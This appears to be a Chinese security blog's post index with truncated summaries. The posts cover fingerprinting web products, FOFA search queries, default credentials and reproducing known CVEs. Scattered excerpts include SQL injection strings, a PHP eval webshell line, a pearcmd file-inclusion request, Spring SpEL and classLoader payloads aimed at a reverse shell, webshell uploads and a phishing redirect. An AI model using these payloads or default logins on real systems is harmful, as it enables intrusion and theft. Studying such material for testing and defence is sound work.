摘要: Apache Activemq是一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 web相关特征 管理端口为8161,访问会出现登录框: 默认账户为:admin/admin,登录后界面如下: 使用activemq搭建的网站,其icon图标为: 高危漏洞复现 C 阅读全文
posted @ 2025-12-02 12:58 shinianyunyan 阅读(30) 评论(0) 推荐(0)
摘要: Apache Druid是一个开源的分布式数据存储 Web相关特征 Duid默认管理页面端口8888,无需账户验证可以直接访问: 其存在标签页默认icon图标: 漏洞复现 CVE-2021-25646(JS导致的RCE) druid的功能中包括执行嵌入在各种类型请求中的用户提供的JavaScript 阅读全文
posted @ 2025-12-02 12:58 shinianyunyan 阅读(96) 评论(0) 推荐(0)
摘要: Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。 Web特征 由于其不是一个特定的web服务,只是一个第三方库,因此一般没有icon等,但也存在一些web默认特征: 配置文件:通常位于/WEB-INF/classes/或/WEB-INF/目录下,文件名以log4j2开头,如 阅读全文
posted @ 2025-12-02 12:57 shinianyunyan 阅读(33) 评论(0) 推荐(0)
摘要: Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Web特征 shiro拥有较强的web特征,此框架主要使用于登录界面,只要出现了类似“记住我”一类的复选框,基本都用的shiro: 响应包的Set-Cookie中也 阅读全文
posted @ 2025-12-02 12:57 shinianyunyan 阅读(52) 评论(0) 推荐(0)
摘要: Apache Struts2 是一个流行的开源 Web 应用框架,用于开发 Java EE Web 应用。它使用并扩展了 Java Servlet API,鼓励开发者采用模型-视图-控制器(MVC)架构。该框架为开发者提供了丰富的标签和实用工具,以创建易于维护和扩展的企业级 Web 应用。 Web特 阅读全文
posted @ 2025-12-02 12:57 shinianyunyan 阅读(52) 评论(0) 推荐(0)
摘要: Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 Web特征 访问8080(可变)即可访问默认页面: 响应中的特征: Server: Apache-Coyote/1.1 X-Po 阅读全文
posted @ 2025-12-02 12:56 shinianyunyan 阅读(20) 评论(0) 推荐(0)
摘要: Atlassian Confluence是企业广泛使用的wiki系统。 Web特征 常用默认端口8090,访问后默认界面就是登录认证界面: 该产品存在标签页默认icon: 漏洞复现 CVE-2023-22515(未授权添加管理员账户) 此漏洞是由属性覆盖导致,利用该漏洞攻击者可以无需验证即可重新执行 阅读全文
posted @ 2025-12-02 12:56 shinianyunyan 阅读(13) 评论(0) 推荐(0)
摘要: ElasticSearch 是一个分布式的RESTful搜索和分析引擎。 Web特征 此应用无前端页面,只是一个api接口,其默认端口为:9200,web默认特征是ES 标志性返回字段:"tagline": "You Know, for Search",以及一些版本信息,且默认没有身份验证。 fof 阅读全文
posted @ 2025-12-02 12:56 shinianyunyan 阅读(24) 评论(0) 推荐(0)
摘要: Fastjson 是阿里巴巴开发的一款 JSON 解析器。 Web特征 fastjson 作为纯 Java JSON 解析库,自身没有任何默认端口、默认路径或默认 Web 界面,但一些配置问题或者其他问题导致其报错,那么就可以判断其使用了fastjson,比如: 根据上面这个报错信息,那么可以生成f 阅读全文
posted @ 2025-12-02 12:56 shinianyunyan 阅读(18) 评论(0) 推荐(0)
摘要: GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 Web特征 默认管理页面显示如下: 该产品存在标签页默认icon图标: 存在账户验证: 基本访问信息: 默认 URL: htt 阅读全文
posted @ 2025-12-02 12:55 shinianyunyan 阅读(58) 评论(0) 推荐(0)
摘要: GitLab是一款Ruby开发的Git项目管理平台。 Web特征 其默认web页面在:http://host:8080/users/sign_in,端口可变,存在用户验证接口。 该产品存在标签页默认icon图标: fofa语法:title="Sign in · GitLab" protocol="h 阅读全文
posted @ 2025-12-02 12:55 shinianyunyan 阅读(54) 评论(0) 推荐(0)
摘要: Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 Web特征 其默认页在8080端口(可变),welcome界面: 该产品存在标签页icon图标: 在欢迎界面可以看到有管理接口的相关入口: 进入后经过身份验证后即可进入管理界面。 fofa语法 阅读全文
posted @ 2025-12-02 12:54 shinianyunyan 阅读(22) 评论(0) 推荐(0)
摘要: Grafana是一个开源的度量分析与可视化套件。 Web特征 其默认页面位于3000端口,访问后默认是登录验证界面: 页面下方会显示当前版本,比如上图中的:v8.2.6 (c3cc4da7a5) 该产品存在标签页默认icon图标: 存在默认账户:admin/admin fofa语法:app="Gra 阅读全文
posted @ 2025-12-02 12:54 shinianyunyan 阅读(76) 评论(0) 推荐(0)
摘要: Jenkins是一个开源的自动化服务器。 Web特征 默认web界面在8080端口(可变): 默认是欢迎界面,其中包含了一个管家头像,右下角会显示其版本信息。 该产品存在标签页icon图标: 此产品存在默认账户admin,但密码随机生成后放置在 initialAdminPassword 文件中,li 阅读全文
posted @ 2025-12-02 12:54 shinianyunyan 阅读(14) 评论(0) 推荐(0)
摘要: Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。 Web特征 此产品默认前台页面在8080(可变),且存在登录功能点: 标签页默认icon图标: 存在后台登入界面:/administrator/,一般访问 /administrator 路径出现这个页面就是joomla产品: 漏洞 阅读全文
posted @ 2025-12-02 12:53 shinianyunyan 阅读(30) 评论(0) 推荐(0)
摘要: Jumpserver是一个开源堡垒机系统。 Web特征 该产品访问8080(可变)即可导向默认界面路径 /core/auth/login/: 通过默认账户密码即可登录(但第一次登录后就会要求修改):admin/admin 还存在其他路径,比如Web Terminal 前端组件 Luna 的访问路径( 阅读全文
posted @ 2025-12-02 12:53 shinianyunyan 阅读(29) 评论(0) 推荐(0)
摘要: kkFileView是一个文档预览解决方案。 Web特征 默认端口为8012,访问即为首页: 默认标题为:kkFileView演示首页 核心预览接口:/onlinePreview fofa语法:body="/onlinePreview?url" 漏洞复现 CVE-2025-4538(ZipSlip 阅读全文
posted @ 2025-12-02 12:52 shinianyunyan 阅读(151) 评论(0) 推荐(0)
摘要: Laravel是一个由Taylor Otwell所创建,免费的开源 PHP Web 框架。 Web特征 访问8080(可变)即可看到默认页面: 默认404页面: 其中包含了: 产品logo: 版本信息: 请求头中默认包含了laravel_session字段: fofa语法:title='larave 阅读全文
posted @ 2025-12-02 12:52 shinianyunyan 阅读(30) 评论(0) 推荐(0)
摘要: MinIO是一个开源对象存储系统。 Web特征 主要默认端口有两个:9000(API端口)和9001(管理界面) 该产品存在默认icon: 其中,页面标题(Title)包含"MinIO" 、HTML正文(Body)包含独特路径 :/minio/health/live、/minio/prometheu 阅读全文
posted @ 2025-12-02 12:52 shinianyunyan 阅读(44) 评论(0) 推荐(0)
摘要: Nacos 是一个设计用于动态服务发现、配置和服务管理的易于使用的平台。 Web特征 访问 8848/nacos/ 即可访问默认界面(Web路径-控制台): 常见API接口: 配置相关:/nacos/v1/cs/configs 服务相关:/nacos/v1/ns/instance/list 权限相关 阅读全文
posted @ 2025-12-02 12:51 shinianyunyan 阅读(24) 评论(0) 推荐(0)
摘要: Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。 Web特征 访问8081即可访问默认页面,其左上角还能看到版本信息,如下图的OSS 3.21.1-01: 在browse选项卡中可以看到存储的内容: 其响应头中Server存 阅读全文
posted @ 2025-12-02 12:51 shinianyunyan 阅读(9) 评论(0) 推荐(0)
摘要: Oracle WebLogic Server是业界广泛使用的Java EE企业级应用服务器。 Web特征 通过端口7001(可变)即可访问其默认管理控制台页面,其中有登录框和版本信息(12.2.1.3.0): 其余默认特征端口: 端口类型 端口号 说明 管理控制台端口 7001(默认) WebLog 阅读全文
posted @ 2025-12-02 12:51 shinianyunyan 阅读(6) 评论(0) 推荐(0)
摘要: Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Web特征 其本身是一个数据库,无web开放页面,所以没有web特征。 默认开放端口:6379 Redis 默认配置不启用密码认证,且默认监听所有网络接口,加上前面的无认证,所以可以使用工具直接进行连接并执行命令等 阅读全文
posted @ 2025-12-02 12:50 shinianyunyan 阅读(4) 评论(0) 推荐(0)
摘要: ThinkPHP是一款运用极广的PHP开发框架。 Web特征 访问8080会进入默认页面,其中包含了thinkphp关键字以及版本信息相关内容: 调试模式特殊响应:访问 /index.php?s=/index/index/xxx(传入不存在的方法),若返回含 think\exception\Clas 阅读全文
posted @ 2025-12-02 12:50 shinianyunyan 阅读(12) 评论(0) 推荐(0)
摘要: XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。 Web特征 XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。 管理端-Web 可视化控制台 常用路径 htt 阅读全文
posted @ 2025-12-02 12:50 shinianyunyan 阅读(16) 评论(0) 推荐(0)
摘要: Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构,包含Web端、Server端、1个Agent和Mysql数据库。 Web特征 web端 通过8080(可变)即可访问web端页面,且存在默认账户(admin/zabbix): 页 阅读全文
posted @ 2025-12-02 12:48 shinianyunyan 阅读(10) 评论(0) 推荐(0)
摘要: Web特征 常见icon: fofa语法:app="畅捷通-TPlus"、app="畅捷通-好会计"、app="畅捷通-好业财"、app="畅捷通-T1"、host="/tplus/"、path="/tplus/UploadHandler.ashx" || path="/tplus/keyEdit. 阅读全文
posted @ 2025-12-02 12:46 shinianyunyan 阅读(6) 评论(0) 推荐(0)
摘要: Web特征 常见的icon图标: fofa语法:app="dahua-DSS"、icon_hash="411052691"、icon_hash="2095320044"、body="/portal/include/script/dahuaDefined/headCommon.js" && title 阅读全文
posted @ 2025-12-02 12:46 shinianyunyan 阅读(9) 评论(0) 推荐(0)
摘要: Web特征 常见icon: fofa语法:app="Dahua-视频监控" && country="CN" 通过80/49152/554/443等端口即可访问默认页面: 页面中的特征: title一般是:WEB SERVICE 响应/请求体中cookie包含:PrvLangCookie30= 页面源 阅读全文
posted @ 2025-12-02 12:44 shinianyunyan 阅读(37) 评论(0) 推荐(0)
摘要: 大华智能物联综合管理平台(iConnection Center,简称 ICC) 是大华股份开发的综合业务管理平台,集成视频监控、门禁、报警、停车场等 40 + 业务子系统,广泛应用于智慧园区、商业综合体等场景。 Web特征 常见icon/logo: fofa语法:icon_hash="-193589 阅读全文
posted @ 2025-12-02 12:44 shinianyunyan 阅读(195) 评论(0) 推荐(0)
摘要: Web特征 通过80/443端口即可访问默认页面: 其他相关Web特征: 类型 路径&详情 URL路径特征 /WebReport/ReportServer、/ReportServer、/report/ReportServer 报表模板访问 包含cmd=fs_signin、op=fs_load等参数 阅读全文
posted @ 2025-12-02 12:41 shinianyunyan 阅读(80) 评论(0) 推荐(0)
摘要: 泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。 Web特征 相关图标: fofa语法:app="泛微-协同商务系统"、app="泛微-协同办公OA"、( 阅读全文
posted @ 2025-12-02 12:41 shinianyunyan 阅读(175) 评论(0) 推荐(0)
摘要: 海康威视 IVMS(Intelligent Video Management System,智能视频管理系统)是一套集视频监控、设备管理、智能分析及多系统融合于一体的综合管理平台,旨在为企业、机构和家庭提供高效、智能的安防解决方案。 Web特征 常见icon/logo: fofa语法:icon_ha 阅读全文
posted @ 2025-12-02 12:41 shinianyunyan 阅读(12) 评论(0) 推荐(0)
摘要: Web特征 常见icon/logo: fofa语法:app="HIKVISION-视频监控" && country="CN"、(app="HIKVISION-视频监控" || body="Hikvision" ) && country="CN" 通过80/81/82/88/554等端口可以访问默认页 阅读全文
posted @ 2025-12-02 12:41 shinianyunyan 阅读(28) 评论(0) 推荐(0)
摘要: 海康威视 iSecure Center (ISC) 是一款综合安防管理平台,用于视频监控、门禁、停车场等系统的集中管理。其 web 界面是信息搜集和资产识别的主要入口。 Web特征 常见icon/logo: fofa语法:app="HIKVISION-iSecure-Center"、body="综合 阅读全文
posted @ 2025-12-02 12:39 shinianyunyan 阅读(78) 评论(0) 推荐(0)
摘要: Web特征 默认icon图标: fofa语法:app="金和网络-金和OA"、(app="金和网络-金和OA" || body="/c6") && (body="金和" || body="JHSoft") URL 路径特征: 系统入口:通常以/c6或/jc6作为 URL 前缀,如http://exa 阅读全文
posted @ 2025-12-02 12:38 shinianyunyan 阅读(29) 评论(0) 推荐(0)
摘要: Web特征 默认icon图标: fofa:app="Landray-OA系统"、title="智慧协同平台"、icon_hash="831854882" 访问后默认是login登录界面: web网页目录结构特征: 默认页面存在一些特征: title:登录系统 版权信息:蓝凌软件 版权所有 Web特征 阅读全文
posted @ 2025-12-02 12:37 shinianyunyan 阅读(34) 评论(0) 推荐(0)
摘要: Web特征 常见icon图标/logo: fofa语法:app="REALOR-天翼应用虚拟化系统"、title="瑞友天翼-应用虚拟化系统"、title="瑞友天翼-应用虚拟化系统" || title="瑞友应用虚拟化系统" || title="瑞友天翼"、port=5872 通过常用端口8088 阅读全文
posted @ 2025-12-02 12:37 shinianyunyan 阅读(2) 评论(0) 推荐(0)
摘要: 若依 (RuoYi) 是一款流行的 Java 开源后台管理系统,广泛应用于 OA、CMS 等场景。 Web特征 常见icon/logo: fofa语法:app="若依-管理系统" 通过80/443/8080等端口即可访问默认页面: Web页面中的特征: title/body中含有关键字:若依管理系统 阅读全文
posted @ 2025-12-02 12:37 shinianyunyan 阅读(29) 评论(0) 推荐(0)
摘要: Web特征 存在一些icon、logo: fofa语法:app="TDXK-通达OA"、title="通达OA" || title="Office Anywhere" 网页title默认是“通达 OA” 或 “Office Anywhere”,也可能被自定义修改,web页面参考: 通达oa存在多个默 阅读全文
posted @ 2025-12-02 12:36 shinianyunyan 阅读(45) 评论(0) 推荐(0)
摘要: Web特征 存在默认icon图标: fofa语法:app="万户网络-ezOFFICE" || app="万户ezOFFICE协同管理平台"、body="/defaultroot/"、icon_hash="6c6265b5ca201dda38c07242d76b738d" 直接访问网页即可看到默认页 阅读全文
posted @ 2025-12-02 12:17 shinianyunyan 阅读(34) 评论(0) 推荐(0)
摘要: 用友 BIP (YonBIP) 是用友公司推出的企业数智化平台,具有云原生、元数据驱动、中台化架构特点。 Web特征 常见icon: fofa语法:title="数字化工作台" || body="YonBIP" || body="iuap" || header="UAP-Server" || app 阅读全文
posted @ 2025-12-02 12:16 shinianyunyan 阅读(73) 评论(0) 推荐(0)
摘要: Web特征 产品icon: fofa语法:app="用友-UFIDA-NC"、app="用友-NC-Cloud"、title="YONYOU NC" 页面标题常为 "YONYOU NC"、"用友 NC"、"NC-IUFO",一些常见页面: PS:有些企业没有处理源码,则在页面下方会显示用友nc的相关 阅读全文
posted @ 2025-12-02 12:14 shinianyunyan 阅读(77) 评论(0) 推荐(0)
摘要: Web特征 常见icon:如/images/tongda.ico fofa语句:app="Yonyou-Seeyon-OA"、app="Yonyou-Seeyon-OA" && (title="A8" || title="G6" || title="V5")、app="FE-协作平台" || tit 阅读全文
posted @ 2025-12-02 12:13 shinianyunyan 阅读(95) 评论(0) 推荐(0)
摘要: Web特征 常见icon/logo: fofa语法:app="H3C-Ent-Router"、app="H3C-Ent-Router" && title="系统管理"、(body="H3C" || body="新华三")&& title="系统管理"、icon_hash: 2065204067 通过 阅读全文
posted @ 2025-12-02 12:12 shinianyunyan 阅读(18) 评论(0) 推荐(0)
摘要: 业务资产查询 查询平台 棱角社区:https://forum.ywhack.com/index.php/ 查询内容 子域名、资产、WEB应用、APP应用、PC端应用、小程序应用、微信公众号、其他产品等 Web应用 架构分类 程序语言、框架源码、搭建平台、数据库、操作系统 技术-指纹识别平台 1、指纹 阅读全文
posted @ 2025-12-02 09:28 shinianyunyan 阅读(22) 评论(0) 推荐(0)
摘要: 漏扫项目 特征类-三方Poc调用&模版Poc调用 案例 案例1:单点对某特征点进行安全评估 docker run -it -p 8888:8080 vulhub/struts2:s2-053 docker run -it -p 8090:8090 vulhub/fastjson:1.2.45 doc 阅读全文
posted @ 2025-12-02 09:28 shinianyunyan 阅读(18) 评论(0) 推荐(0)
摘要: 准备工作 域名和站点搭建 1、由于没有购买域名,所以这里需要修改host文件,将文档中的url绑定到攻击ip 这里使用clientweb.docer.wps.cn.cloudwps.cn作为url 2、如果是真实场景,就购买一个{xxxx}.wps.cn的域名,搭建一个网站,网站文件为1.html, 阅读全文
posted @ 2025-12-02 09:27 shinianyunyan 阅读(13) 评论(0) 推荐(0)
摘要: 图片验证码识别 1、打开监听 2、找到验证码请求连接 3、配置插件 4、抓取请求包后设置参数 6、设置线程数为1 7、开始测试 发了两个包,可以看到监听的成功获取、识别到了验证码图片,bp这边的结果也可以看到正确提交了。 阅读全文
posted @ 2025-12-02 09:27 shinianyunyan 阅读(8) 评论(0) 推荐(0)
摘要: 猜数据库长度:9位 union select if(length(database())=9, sleep(3), 0), 2;-- 猜数据库名:sqli_four UNION SELECT IF(database()="sqli_four", SLEEP(3), 0), 2;-- 猜数据库表数量: 阅读全文
posted @ 2025-12-02 09:26 shinianyunyan 阅读(5) 评论(0) 推荐(0)
摘要: URL重定向 1、通过google搜索语法,搜索连接中含有?url的连接 2、找到符合要求的网站 3、进入网站,进行url跳转测试,这里使用百度进行测试 可以看到成功跳转,那么后续就可以尝试使用爬虫工具将原网站爬下来,作为钓鱼页面 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(8) 评论(0) 推荐(0)
摘要: 1、进入页面,进入后台 要求登录,使用默认弱口令尝试登录 tomcat tomcat 成功登入 2、使用哥斯拉生成jsp文件,压缩为zip,再改后缀为war 3、上传 出现了一个目录,访问它,然后再接上1.jsp,可以看到有文件,只是不显示内容 4、使用哥斯拉进行连接 成功连接 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(5) 评论(0) 推荐(0)
摘要: 1、打开页面,可以看到版本信息为6.x 2、直接bp抓包、发包测试,发送测试信息 先访问一下 /shell.php 看是否本身存在该路径 可以看到没有网页。 数据包发送payload: GET /index.php?+config-create+/&lang=../../../../../../.. 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(11) 评论(0) 推荐(0)
摘要: Swagger 自动发包 0、环境:RefiningStone-RBAC(最终版) 1、访问swagger接口,拼接url:/swagger-ui.html 2、使用postman添加链接 要选择测试套件 3、自动发包 再次尝试: 成功批量化 注:有一些缺陷,如:①UA头需要重新自定义,否则实战中会 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(20) 评论(0) 推荐(0)
摘要: SSTI靶场 0、靶场 1、随便打开一个靶场端口进行测试,这里选择5020,php-smarty 可以看到有一个输入框,经过测试发现只有在页面的输入框中输入内容才会通过post发送,回显;url处不行。 2、使用SSTImap工具进行测试 python .\sstimap.py -u http:// 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(6) 评论(0) 推荐(0)
摘要: Springboot框架-泄露 泄露安全 黑盒 0、环境:RefiningStone-RBAC(最终版) 1、使用bp插件APIKit,再访问目标,查看是否有泄露的url显示 可以看到插件识别出来了有env,heapdump文件泄露,那么后续就直接访问 /actuator/heapdump,将其下载 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(3) 评论(0) 推荐(0)
摘要: 手工测 1、访问目标网站,bp抓包 2、改包,添加payload GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(reque 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(9) 评论(0) 推荐(0)
摘要: readObject 反序列化漏洞 1、审计-全局搜索readObject()函数 可以看到代码中使用base64解码后转码,反序列化 2、查看外部库版本 根据 ysoserial-0.0.8-SNAPSHOT-all 项目工具的表来看,可以尝试 CommonsCollections5进行测试 3、 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(5) 评论(0) 推荐(0)
摘要: Log4j审计 1、在项目中搜索log4j,观察是否使用log4j,有的话查看版本信息,历史漏洞等 可以看到有使用log4j的包,去pom.xml寻找版本信息: 查询可以知道该版本存在历史漏洞 2、全局搜索功能实现函数 logger.info 或 logger.error 可以看到绝大多数的函数都是 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(10) 评论(0) 推荐(0)
摘要: JavaSec靶场shiro利用 1、存在用户登录授权的功能 2、有记住我的选项,勾选,然后随便提交一个,观察数据包 存在rememberme关键字,大概率是shiro 3、使用shiro利用工具测试一下 可以看到就是shiro组件,而且可以被利用 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(6) 评论(0) 推荐(0)
摘要: JavaSec靶场log4j带外 使用dnslog进行带外测试 可以看到有访问记录产生 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(5) 评论(0) 推荐(0)
摘要: FastJson审计 1、在项目文件中搜索json,观察是否使用了json传输,用的什么类型的json传输组件,版本信息等 去包管理文件pom.xml中查找组件信息 可以看到,这个项目使用的是fastjson,版本是1.2.58,通过搜索能找到存在历史漏洞 2、搜索实现函数 JSON.parse 和 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(23) 评论(0) 推荐(0)
摘要: 1、访问靶场页面 2、bp抓包、改包,将payload填入数据包 POST:/functionRouter //这里的反弹shell要经过base64编码 spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntim 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(13) 评论(0) 推荐(0)
摘要: 1、访问目标网页 查看是否满足漏洞条件: 条件1:Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用) 可以看到dataimport可以使用,满足条件1 条件2:Solr Admin UI未开启鉴权认证。(默认情况无需任何认证) 可 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(6) 评论(0) 推荐(0)
摘要: 1、访问目标网页,使用的tomcat,直接测试,随便抓一个包先 2、改包,添加木马文件 成功发送 可以看到有文件了 3、哥斯拉连接 成功连接 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(7) 评论(0) 推荐(0)
摘要: title: cve_2021_42013 created: 2024-12-05T15:14:00 updated: 2024-12-05T15:14:00 1、查看中间件信息 有些时候直接从浏览器的检查就可以看到中间件信息: 可以看到,是Apache 2.4.50满足cve_2021_42013 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(10) 评论(0) 推荐(0)
摘要: Another-Redis工具实战 1、在fofa上搜索相关服务和端口的产品 2、使用Another-Redis工具连接 连接成功!还可以看到相关信息 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(4) 评论(0) 推荐(0)
摘要: 反序列化攻击简要汇总 Web 反序列化漏洞汇总对比表 漏洞类型 技术原理 关键触发点 流量特征 防御关键 Java 原生反序列化 调用 ObjectInputStream.readObject() 时,恶意序列化数据触发 Gadget Chain(如 InvokerTransformer→Runti 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(18) 评论(0) 推荐(0)
摘要: PHP反序列化漏洞 一、基础概念 1. PHP序列化 定义:将复杂数据结构转换为字符串以便传输或存储。 函数:serialize() 示例: $data = ["name" => "test", "age" => 20]; echo serialize($data); // 输出:a:2:{s:4: 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(43) 评论(0) 推荐(0)
摘要: 一、前言 XSS 的本质是一种高级钓鱼手法。 二、什么是 XSS XSS (Cross Site Scripting) 攻击全称跨站脚本攻击,是为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS。 XSS 是一种经常出现在 Web 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(621) 评论(0) 推荐(0)
摘要: DOM型与反射型XSS的区别及分析 前言 XSS漏洞根据触发方式可分为三类:反射型、存储型和DOM型。初学者常混淆反射型与DOM型XSS,本文通过对比分析帮助理解二者的核心差异。 DOM型与反射型对比图 以下为两种XSS的异同对比示意图: 反射型XSS数据流:客户端→服务端→客户端 DOM型XSS数 阅读全文
posted @ 2025-12-02 09:23 shinianyunyan 阅读(25) 评论(0) 推荐(0)
摘要: 业务逻辑 逻辑越权-检测原理-水平&垂直&未授权 0、图解 1、水平越权 同级别的用户 之间权限的跨越 即:A 用户修改 B 用户的账户信息 方法:通过抓包,修改包信息 2、垂直越权 低级别用户到高级别用户 权限的跨越 即:普通用户可以修改管理员账户信息 方法:通过抓包,修改包信息 3、未授权访问 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(18) 评论(0) 推荐(0)
摘要: 一句话木马&菜刀原理 一、一句话木马的了解 "一句话木马"服务端(本地存储的脚本木马文件): 就是我们要用来将恶意代码上传到服务器的网站中执行权限, 该语句触发后,接收入侵者通过客户端提交的数据,执行并完成相应的操作。服务端的代码内容为<?php @eval($_POST['fox']) ?> 其中 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(57) 评论(0) 推荐(0)
摘要: 一、原理和危害(主要原因是过滤不严) 文件包含漏洞:即 file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(), require()和include_once(), requir_once())利用U 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(71) 评论(0) 推荐(0)
摘要: 一、XML概念 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语。XML3 文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。在HTML文档中显示动态数据。 1、DTD(文档类型定义) 作用:定义XML文档的合法 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(33) 评论(0) 推荐(0)
摘要: 攻击流程 当用户输入直接嵌入模板而未进行适当的验证或转义时,攻击者可以构建更改模板行为的有效载荷。这可能导致各种意外的服务器端操作,包括: 读取或修改服务器端文件。 执行系统命令。 访问敏感信息(例如,环境变量、数据库凭证)。 漏洞存在验证 使用以下字符串,进行依次拼接观察是否会报错 ${{<%[% 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(29) 评论(0) 推荐(0)
摘要: SQL注入原理与方法全解析 1. 漏洞概述及危害 1.1 漏洞原理 用户可控输入未经过滤直接拼接到SQL语句中,导致恶意代码执行。 1.2 漏洞危害 数据泄露:获取数据库名、表名、字段、敏感信息 权限提升:写入Webshell、远程控制服务器 数据篡改:添加恶意账号、篡改页面内容 服务瘫痪:通过恶意 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(142) 评论(0) 推荐(0)
摘要: ORM通过抽象数据库层,是开发者通过使用对象而不是表和行来进行数据库数据的操作 运行逻辑 插入信息: use App\Models\User; // Create a new user $user = new User(); $user->name = 'Admin'; $user->email = 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(27) 评论(0) 推荐(0)
摘要: CORS (跨域资源共享)配置错误 原理&概念 原理 不安全的 CORS 配置(特别是错误的 ACAO + ACAC 组合)允许恶意网站(attacker.com) 通过受害用户的浏览器发起跨域请求到目标网站(victim.com),并携带用户的认证凭证(如会话 Cookie)。如果目标网站的响应被 阅读全文
posted @ 2025-12-02 09:21 shinianyunyan 阅读(16) 评论(0) 推荐(0)
摘要: 资产收集 抓包问题 没有限制过滤 1、抓不到-工具证书没配置好 2、抓不到-app走的不是http/s,走的其他协议 有限制过滤 3、抓不到-反模拟器调试 4、抓不到-反代理VPN 5、抓不到-反证书检验(单、双向校验) 做移动安全测试时,设置好了代理,但抓不到数据包 反抓包Demo:https:/ 阅读全文
posted @ 2025-12-02 09:20 shinianyunyan 阅读(55) 评论(0) 推荐(0)
摘要: Fuzz 模糊测试-前置知识&应用 1、什么是 Fuzz 一种基于黑盒的自动化软件模糊测试技术, 简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试。 2、Fuzz 的核心思想 口令 Fuzz(弱口令)目录 Fuzz(漏洞点)参数 Fuzz(利用参数)Payloa 阅读全文
posted @ 2025-12-02 09:20 shinianyunyan 阅读(71) 评论(0) 推荐(0)
摘要: 数据库安全 目标判断-端口扫描&组合判断&信息来源 前置知识 1、复现环境-Vulfocus/Vulhub 注:Vulfocus(官方在线的无法使用) 相关文档:官方手册,解决搭建、无法同步问题 2、服务判断 端口扫描:利用服务开启后目标端口开放判断 组合判断:利用搭建常见组合分析可能开放服务 信息 阅读全文
posted @ 2025-12-02 09:20 shinianyunyan 阅读(36) 评论(0) 推荐(0)
摘要: API接口 API探测&常用API 目前最常见的是:GraphQL,REST-WADL(最多); 早期用的较多的是:SOAP_WSDL; 智能家居等设备常用:gRPC API接口分为小众接口和官方接口,官方接口能测到的漏洞很少,能测到漏洞的基本是小众接口 API分类特征 SOAP - WSDL 特征 阅读全文
posted @ 2025-12-02 09:20 shinianyunyan 阅读(30) 评论(0) 推荐(0)
摘要: 前置内容 CL:Content-Length CL的值为请求体长度,设定为多少就解析到多少,超出的内容丢弃,比如: POST /submit HTTP/1.1 Host: good.com Content-Type: application/x-www-form-urlencoded Content 阅读全文
posted @ 2025-12-02 09:19 shinianyunyan 阅读(24) 评论(0) 推荐(0)
摘要: title: 拖库的七种方法 updated: 2024-11-26T18:51:11 created: 2023-06-22T20:51:02 方法1:直接页面拖库 acccess数据库mdb格式 参考Aspcms框架拿webshell,该管理页面存在数据库备份模块: 通过菜刀查到了数据库模块备份 阅读全文
posted @ 2025-12-02 09:19 shinianyunyan 阅读(35) 评论(0) 推荐(0)
摘要: 语言安全 ASP ASP-默认安装-MDB 数据库泄漏下载 由于大部分 ASP 程序与 ACCESS 数据库搭建,但 ACCESS 无需连接,都在脚本文件中定义配置好数据库路径即用,不需要额外配置安装数据库,所以大部分提前固定好的数据库路径默认未修改,当攻击者知道数据库的完整路径,可远程下载后解密数 阅读全文
